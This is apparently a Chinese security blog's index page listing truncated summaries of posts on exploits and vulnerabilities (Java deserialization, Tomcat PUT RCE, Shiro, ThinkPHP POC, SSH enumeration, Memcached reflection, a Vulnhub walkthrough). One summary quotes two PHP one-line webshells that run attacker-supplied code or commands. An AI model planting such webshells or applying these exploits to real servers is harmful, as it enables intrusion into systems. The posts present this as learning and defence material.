斑林鸽的代码世界

2021年5月24日

摘要： redis简介 redis 一款高性能key-value数据库，实际上多用作缓存队列或者消息分发（celery）,但是最常常被用来做缓存。 redis安装源码安装 $ wget http://download.redis.io/releases/redis-2.8.17.tar.gz $ tar 阅读全文

posted @ 2021-05-24 10:27 斑林鸽的代码世界阅读(61) 评论(0) 推荐(0) 编辑

新型横向移动工具原理分析、代码分析、优缺点以及检测方案

摘要：新横向移动工具： Twitter上看到新的横移工具，无需创建服务、无需文件落地，远比PsExec来的难以检测，我们针对这一工具进行原理分析、代码分析、优缺点评估以及检测方案：工具名称：SharpNoPSExec 工具作者：juliourena 下载地址：SharpNoPSExec 本人修改Pyth 阅读全文

posted @ 2021-05-24 10:25 斑林鸽的代码世界阅读(114) 评论(0) 推荐(0) 编辑

2021年4月21日

Java反序列化漏洞的挖掘、攻击与防御

摘要：一、Java反序列化漏洞的挖掘 1、黑盒流量分析：在Java反序列化传送的包中，一般有两种传送方式，在TCP报文中，一般二进制流方式传输，在HTTP报文中，则大多以base64传输。因而在流量中有一些特征：（1）TCP：必有aced0005，这个16进制流基本上也意味者java反序列化的开始；阅读全文

posted @ 2021-04-21 15:06 斑林鸽的代码世界阅读(1522) 评论(0) 推荐(0) 编辑

关于Memcached反射型DRDoS攻击分析

摘要：一、Memcached反射攻击原理 1、反射DRDoS攻击： DRDoS攻击时DoS攻击的一种,DoS是指通过发送或引发大量的资源消耗导致服务不可用的一种攻击方式，中文称之为拒绝服务攻击。DRDoS是反射性拒绝服务攻击，其原理是通过利用你的程序漏洞，发送畸形报文诱发你回复大数据量的报文，从而达到消耗阅读全文

posted @ 2021-04-21 15:04 斑林鸽的代码世界阅读(245) 评论(0) 推荐(0) 编辑

spark未授权RCE漏洞

摘要： Spark简介 spark是一个实现快速通用的集群计算平台。它是由加州大学伯克利分校AMP实验室开发的通用内存并行计算框架，用来构建大型的、低延迟的数据分析应用程序。它扩展了广泛使用的MapReduce计算模型。高效的支撑更多计算模式，包括交互式查询和流处理。spark的一个主要特点是能够在内存中阅读全文

posted @ 2021-04-21 15:02 斑林鸽的代码世界阅读(1524) 评论(0) 推荐(0) 编辑

2021年4月13日

关于metaspolit中进行JAVA反序列化渗透RMI的原理分析

摘要：一、背景：这里需要对java反序列化有点了解，在这里得推广下自己的博客嘛，虽然写的不好，广告还是要做的。原谅我： 1、java反序列化漏洞原理研习 2、java反序列化漏洞的检测二、攻击手法简介针对这个使用msf攻击需要大家看一篇文章：JMX RMI Exploit 实例，鸣谢，确实学到了阅读全文

posted @ 2021-04-13 13:59 斑林鸽的代码世界阅读(656) 评论(0) 推荐(0) 编辑

Tomcat远程任意代码执行漏洞及其POC

摘要：一、原理分析：只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false，则Tomcat可以不经任何身份验证的控制直接接收PUT方式上传的文件，无论上传者是任何人，也无论上传的是任何文件。此时可以上传jsp文件，直接执行jsp代码。二、实阅读全文

posted @ 2021-04-13 13:54 斑林鸽的代码世界阅读(752) 评论(0) 推荐(0) 编辑

Cisco IOS和IOS XE 新漏洞检测与修复

摘要： Cisco IOS/IOS XE 新漏洞检测与修复 CVE-2018-0150 Cisco IOS XE 存在默认弱口令漏洞影响：默认弱口令可以导致攻击者直远程登录控制Cisco设备。受影响版本，Cisco IOS XE 16.x 修复方案： router# no username cisco 阅读全文

posted @ 2021-04-13 13:53 斑林鸽的代码世界阅读(240) 评论(0) 推荐(0) 编辑

CVE-2018-2628 weblogic WLS反序列化漏洞

摘要： weblogic WLS 反序列化漏洞学习 ## 漏洞简介 ## *** + 漏洞威胁：RCE--远程代码执行 + 漏洞组件：weblogic + 影响版本：10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3 + 温馨提示：对于攻击者自己构造的新的payload，还没有被orac 阅读全文

posted @ 2021-04-13 13:52 斑林鸽的代码世界阅读(168) 评论(0) 推荐(0) 编辑

系统，中间件，IPMI组件等不同级别弱口令汇总

摘要：系统级产品级弱口令组件级中间件级弱口令 IPMI组件弱口令阅读全文

posted @ 2021-04-13 13:50 斑林鸽的代码世界阅读(138) 评论(0) 推荐(0) 编辑

SNMP信息泄露漏洞

摘要： SNMP协议简介名称：SNMP（Simple Network Management Protocol）简单网络管理协议端口：161协议：UDP用途：SNMP代理者以变量呈现管理资料。管理系统透过GET，GETNEXT和GETBULK协定指令取回资讯，或是代理者在没有被询问的情况下，使用TRAP或I 阅读全文

posted @ 2021-04-13 13:49 斑林鸽的代码世界阅读(1110) 评论(0) 推荐(0) 编辑

Apache Shiro 反序列化RCE漏洞

摘要：漏洞介绍漏洞类型：JAVA反序列化（RCE）影响版本：Apache Shiro 1.2.4及其之前版本漏洞评级：高危漏洞分析 #：下载漏洞环境： git clone https://github.com/apache/shiro.git git checkout shiro-root 阅读全文

posted @ 2021-04-13 13:48 斑林鸽的代码世界阅读(318) 评论(0) 推荐(0) 编辑

SSH用户枚举漏洞（CVE-2018-15473）原理学习

摘要：一、漏洞简介 1、漏洞编号和类型 CVE-2018-15473 SSH 用户名（USERNAME）暴力枚举漏洞 2、漏洞影响范围 OpenSSH 7.7及其以前版本 3、漏洞利用方式由于SSH本身的认证机制存在缺陷，导致攻击者可以使用字典，暴力枚举SSH存在的用户名(Username) 4、漏洞修阅读全文

posted @ 2021-04-13 13:47 斑林鸽的代码世界阅读(1844) 评论(0) 推荐(0) 编辑

Linux下利用动态链接劫持库函数并注入代码

摘要：关于环境变量$ LD_PRELOAD $LD_PRELOAD是一个环境变量，用于加载动态库，他的优先级是最高的 /* 优先级顺序： (1)$LD_PRELOAD (2)$LD_LIBRARY_PATH (3)/etc/ld.so.cache (4)/lib (5)/usr/lib */ 一个挑战就是阅读全文

posted @ 2021-04-13 13:46 斑林鸽的代码世界阅读(202) 评论(0) 推荐(0) 编辑

2021年2月4日

常见的文件包含漏洞

摘要：一、什么是文件包含程序开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件。而无需再次编写，这种文件调用的过程一般被称为文件包含。例如：include “conn.php” PHP中常见包含文件函数 include() 当使用该函数包含文件时，只有代码执行到inclu 阅读全文

posted @ 2021-02-04 16:56 斑林鸽的代码世界阅读(182) 评论(0) 推荐(0) 编辑

Web 安全之内容安全策略（Content-Security-Policy,CSP）详解

摘要： Web 安全之内容安全策略（Content-Security-Policy,CSP）详解 1.CSP 简介内容安全策略（Content Security Policy，简称CSP）是一种以可信白名单作机制，来限制网站是否可以包含某些来源内容，缓解广泛的内容注入漏洞，比如 XSS。简单来说，就是我阅读全文

posted @ 2021-02-04 16:55 斑林鸽的代码世界阅读(3477) 评论(0) 推荐(0) 编辑

代码审计学习01-in_array() 函数缺陷

摘要：一、开始代码审计之旅 01 从今天起，学习代码审计了，这篇文章就叫代码审计01吧，题目来自 PHP SECURITY CALENDAR 2017 的第一题，结合红日安全写的文章，开始吧。二、先看这道题目 1、题目名称：Wish List 2、in_array() 函数的作用 in_array( 阅读全文

posted @ 2021-02-04 16:54 斑林鸽的代码世界阅读(229) 评论(0) 推荐(0) 编辑

靶机渗透实战2：Bulldog: 1

摘要：一、准备说明：攻击机：WMware 中的 Kali Linux 靶机：VMware 中的 Bulldog: 1（下载地址：https://www.vulnhub.com/entry/bulldog-1,211/）目标：Escalate the privileges to root and cap 阅读全文

posted @ 2021-02-04 16:53 斑林鸽的代码世界阅读(158) 评论(0) 推荐(0) 编辑

2021年1月26日

PHP一句话木马小总结与SQL语句写一句话木马

摘要：一、基础类的一句话--功能仅限于验证漏洞了，实际中太容易被查出出来： 1 <?php @eval($_GET["code"])?> 2 <?php @system($_POST["cmd"])?> 相信一目了然可以看懂如何使用这类一句话。如果有疑问可以看我的博客PHP后门的eval类和system 阅读全文

posted @ 2021-01-26 14:26 斑林鸽的代码世界阅读(913) 评论(0) 推荐(0) 编辑

ThinkPHP-5.0.23新的RCE漏洞测试和POC

摘要： TP5新RCE漏洞昨天又是周五，讨厌周五曝漏洞，还得又得加班，算了，还是先验证一波。新的TP5RCE，据说发现者因为上次的RCE，于是又审计了代码，结果发现的。TP5也成了万人轮啊。测试环境搭建 windows下phpstudy，然后下载tp5.0.23到相应的www目录下 linux，安装启阅读全文

posted @ 2021-01-26 14:24 斑林鸽的代码世界阅读(711) 评论(0) 推荐(0) 编辑

World peace

技术可以改变世界，推动世界，也能毁灭世界& 在路上，且行且珍惜！

公告